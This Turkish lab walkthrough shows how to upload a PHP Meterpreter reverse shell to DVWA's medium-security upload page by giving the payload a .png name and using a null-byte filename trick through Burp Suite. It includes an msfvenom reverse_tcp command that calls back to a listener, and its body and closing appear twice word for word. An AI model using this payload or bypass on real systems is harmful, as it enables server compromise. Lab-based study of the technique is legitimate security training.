Selamın aleyküm arkadaşlar. Ben AdaletinKILICI. Bu yazımızda sizlerle beraber yüksek güvenlikli upload kısımlarına shell atmayı göreceğiz. İsterseniz hemen başlayalım. Ben bunun için DVWA labaratuvarını kullanacağım ve anlatımımı onun üzerinden yapacağım. Let's go.
-----------------------------------------------------------------
Öncelikle DVWA security i lowdan medium a alalım.
Sonra ise upload açıklı yerimize gidelim.
Öncelikle upload etmek için bir shell oluşturalım. Ben msfvenom ile bir shell oluşturacağım.
Kod:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.107.1 LPORT=1453 -f raw
Sonra ise resimde gördüğünüz yerleri kopyalayıp bir dosyaya kaydediyoruz.
Ama dosyayı kaydederken uzantısını png yapmayı unutmayın:)
Şimdi de shellimizi dinlemeye alalım. Bunun için ****sploitteki multi/handler exploitini kullanacağız. Nasıl kullanılacağını anlatmayacağım. Biraz araştırma ile öğrenebilirsiniz. Port ve Ip'yi shell dekilerle aynı girmeyi unutmayın!
Şimdi açıklı sayfamıza geri dönelim. Buradan herhangi bir php dosya yüklemeye çalışırsak resimde de göreceğiniz gibi hatayla karşılaşırız. Bunun sebebi oradaki güvenlik önlemlerinin alınmış olması. Ama bu bizi durdurmaz:)
Şimdi asıl işimizin olduğu kısma geldik. Öncelikle burpsuite programını normal ayarlarında açıyoruz.
Sonra da firefox ayarlarımızı yapıyoruz.
Artık işlemimizi burp ile yakalama vakti geldi. İlk başta oluşturduğumuz png shell i yüklemeye çalışıyoruz. Böylelikle bu işlemin burp tarafından yakalanmasını sağlıyoruz.
Evet işlemimizi yakaladık. Şimdi işimiz HEX lerle. Öncelikle filename parametresinden sonra yazan shell adımızda php den sonra "A" harfini yazıyoruz. Siz istediğiniz harfi yazabilirsiniz. Yeter ki HEX karşılığını bilin.
A harfinin HEX olarak karşılığı 41. Şimdi HEX sekmesine geliyoruz ve filename=shelladi satırını buluyoruz.
Sonra ise o satırda yazdığımız harfin HEX karşılığını buluyoruz.
Tamam bulduk hocam peki şimdi ne yapacağız? Bu sorunun cevabı şöyle. Biz oradaki sayıyı silip(Bende 41) yerine 00 yazarsak ondan sonra yazılanlar önemsenmeyecek ve es geçilecektir. İsterseniz deneyelim.
00 yazdık ve forward tuşuna bastık. DVWA ya bakacak olursak upload edildiğini görürüz. Artık son olarak bize verdiği linke gidip bağlantımızı kurmak kaldı. Böylelikle hedef sisteme upload açığıyla shell atmış olduk:)
-----------------------------------------------------------------
Öncelikle DVWA security i lowdan medium a alalım.
Sonra ise upload açıklı yerimize gidelim.
Öncelikle upload etmek için bir shell oluşturalım. Ben msfvenom ile bir shell oluşturacağım.
Kod:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.107.1 LPORT=1453 -f raw
Sonra ise resimde gördüğünüz yerleri kopyalayıp bir dosyaya kaydediyoruz.
Ama dosyayı kaydederken uzantısını png yapmayı unutmayın:)
Şimdi de shellimizi dinlemeye alalım. Bunun için ****sploitteki multi/handler exploitini kullanacağız. Nasıl kullanılacağını anlatmayacağım. Biraz araştırma ile öğrenebilirsiniz. Port ve Ip'yi shell dekilerle aynı girmeyi unutmayın!
Şimdi açıklı sayfamıza geri dönelim. Buradan herhangi bir php dosya yüklemeye çalışırsak resimde de göreceğiniz gibi hatayla karşılaşırız. Bunun sebebi oradaki güvenlik önlemlerinin alınmış olması. Ama bu bizi durdurmaz:)
Şimdi asıl işimizin olduğu kısma geldik. Öncelikle burpsuite programını normal ayarlarında açıyoruz.
Sonra da firefox ayarlarımızı yapıyoruz.
Artık işlemimizi burp ile yakalama vakti geldi. İlk başta oluşturduğumuz png shell i yüklemeye çalışıyoruz. Böylelikle bu işlemin burp tarafından yakalanmasını sağlıyoruz.
Evet işlemimizi yakaladık. Şimdi işimiz HEX lerle. Öncelikle filename parametresinden sonra yazan shell adımızda php den sonra "A" harfini yazıyoruz. Siz istediğiniz harfi yazabilirsiniz. Yeter ki HEX karşılığını bilin.
A harfinin HEX olarak karşılığı 41. Şimdi HEX sekmesine geliyoruz ve filename=shelladi satırını buluyoruz.
Sonra ise o satırda yazdığımız harfin HEX karşılığını buluyoruz.
Tamam bulduk hocam peki şimdi ne yapacağız? Bu sorunun cevabı şöyle. Biz oradaki sayıyı silip(Bende 41) yerine 00 yazarsak ondan sonra yazılanlar önemsenmeyecek ve es geçilecektir. İsterseniz deneyelim.
00 yazdık ve forward tuşuna bastık. DVWA ya bakacak olursak upload edildiğini görürüz. Artık son olarak bize verdiği linke gidip bağlantımızı kurmak kaldı. Böylelikle hedef sisteme upload açığıyla shell atmış olduk:)
KAPANIŞ
Bu yazımız da bu kadardı arkadaşlar. Bi dahaki yazıda görüşmek üzere. Sağlıcakla kalın...
Bu yazımız da bu kadardı arkadaşlar. Bi dahaki yazıda görüşmek üzere. Sağlıcakla kalın...